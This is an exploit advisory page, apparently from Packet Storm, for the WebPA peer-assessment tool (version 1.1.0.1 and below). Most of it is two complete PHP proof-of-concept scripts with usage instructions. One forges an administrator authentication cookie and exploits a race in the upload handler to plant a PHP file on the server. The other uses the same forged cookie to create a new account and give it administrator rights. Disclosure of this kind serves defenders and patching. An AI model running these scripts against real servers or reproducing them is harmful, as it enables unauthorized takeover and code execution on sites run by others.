exploit the possibilities

WebPA 1.1.0.1 File Upload / Add Administrator

WebPA 1.1.0.1 File Upload / Add Administrator
Posted Aug 24, 2012
Authored by dun

WebPA versions 1.1.0.1 and below suffers from add administrator and arbitrary file upload vulnerabilities.

tags | exploit, arbitrary, vulnerability, bypass, file upload
MD5 | 3c213bf9e0a7f33fc0e2999108c7fdc6

WebPA 1.1.0.1 File Upload / Add Administrator

Change Mirror Download
:::::::-.   ...    ::::::.    :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-08-23 ]
##################################################
# [ WebPA <= 1.1.0.1 ] Multiple Vulnerabilities #
##################################################
#
# Script: "WebPA is an open source online peer assessment tool that enables
# every team member to recognise individual contributions to group work."
#
# Vendor: http://www.webpaproject.com/
# Download: http://sourceforge.net/projects/webpa/files/webpa/
# Exploits were tested on:
# Windows (Apache 2.2.17 + php 5.2.17)
# Linux Centos (Apache 2.2.3 (CentOS) + php 5.2.17)
#
##################################################
# [ Arbitrary File Upload ]
# PoC exploit Code:
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $port, $headers) {
$fp = fsockopen($host, $port);
if (!$fp) die('Connection -> fail');
fputs($fp, $headers);
return $fp;
}

function http_recv($fp) {
$ret="";
while (!feof($fp))
$ret.= fgets($fp, 1024);
fclose($fp);
return $ret;
}

print "\n# WebPA v1.1.0.1 Arbitrary File Upload #\n";
print "# Discovered by dun \ posdub[at]gmail.com #\n\n";
if ($argc < 3) {
print "Usage: php $argv[0] <host> <path>\n";
print "Example: php $argv[0] localhost /WebPA/\n";
die();
}

$host = $argv[1];
$path = $argv[2];
$tmp = 'tmp/';
$temp_prefix='temp_';
$up_file='phpinfo.php';
$i=0;
// preparing cookie for authentication bypass
$cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array('user_id'=> '1', 'admin'=> '1')));
// preparing POST data to perform the maximum delay before deleting temporary php file
$payload = "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"%s\"\r\n";
$payload .= "Content-Type: text/plain\r\n\r\n";
$payload .= "<?php fwrite(fopen('%s','w'),'<?php phpinfo(); ?>'); ?>!".str_repeat("A",40)."\r\n";
// making max lag, before unlink
$payload .= str_repeat(str_repeat("A!",1)."!".str_repeat("A!",4)."\r\n",1000)."\r\n";
$payload .= "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"rdoFileContentType\"\r\n\r\n";
$payload .= "2\r\n";
$payload .= "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"rdoFileSeperator\"\r\n\r\n";
$payload .= "!\r\n";
$payload .= "-----------------------------187161971819895--\r\n";
$headers = "POST {$path}{$tmp}readfile.php HTTP/1.1\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\r\n";
$headers .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$headers .= sprintf($payload, $temp_prefix.$up_file, $up_file);
fclose(http_send($host, 80, $headers));
$headers = "GET {$path}{$tmp}%s HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n\r\n";

while(++$i<1000) {
$res=http_recv(http_send($host, 80, sprintf($headers, $temp_prefix.$up_file)));
if(!preg_match('/404 Not Found/',$res)) {
$res=http_recv(http_send($host, 80, sprintf($headers, $up_file)));
if(preg_match('/200 OK/',$res))
print "Success!\n\nUploaded file: http://{$host}{$path}{$tmp}{$up_file}\n";
break;
}
}
if($i==1000) print "Failed.\n";
?>
#
##################################################
# [ Arbitrary Add Admin ]
# PoC exploit Code:
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $port, $headers) {
$fp = fsockopen($host, $port);
if (!$fp) die('Connection -> fail');
fputs($fp, $headers);
return $fp;
}

function http_recv($fp) {
$ret="";
while (!feof($fp))
$ret.= fgets($fp, 1024);
fclose($fp);
return $ret;
}

print "\n# WebPA v1.1.0.1 Arbitrary Add Admin Exploit #\n";
print "# Discovered by dun \ posdub[at]gmail.com #\n\n";
if ($argc < 5) {
print "Usage: php $argv[0] <host> <path> username password\n";
print "Example: php $argv[0] localhost /WebPA/ foo bar\n";
die();
}

$host = $argv[1];
$path = $argv[2];
$newuser = $argv[3];
$newpass = $argv[4];
$cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array( 'user_id'=> '1', 'admin'=> '1' )));
print "Adding a new user [ {$newuser} : {$newpass} ]\n";
$payload = "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"user.csv\"\r\n";
$payload .= "Content-Type: text/csv\r\n\r\n";
$payload .= "institutional_reference,forename,lastname,email,username,module_code,department_id,course_id,password\r\n";
$payload .= "1,2,3,4,{$newuser},6,7,8,{$newpass}\r\n\r\n";
$payload .= "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"rdoFileContentType\"\r\n\r\n";
$payload .= "2\r\n";
$payload .= "-----------------------------187161971819895--\r\n";
$headers = "POST {$path}admin/load/simple.php HTTP/1.1\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\r\n";
$headers .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$headers .= ($payload);
fclose(http_send($host, 80, $headers));
sleep(2);
print "Granting admin privileges for user [ {$newuser} ]\n";
$headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n";
preg_match_all('/php\?u=(\d+)/',http_recv(http_send($host, 80, $headers)) , $matches);
if(!is_numeric(max($matches[1]))) die('Failed.');
sleep(2);
$payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=".urlencode('Save Changes');
$headers = "POST {$path}admin/edit/index.php?u=".max($matches[1])." HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$headers .= ($payload);
fclose(http_send($host, 80, $headers));
print "Success!\n\n";
print "http://{$host}{$path}login.php\n";
print "user: {$newuser}\n";
print "pass: {$newpass}\n";
?>
#
### [ dun / 2012 ] ###############################


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close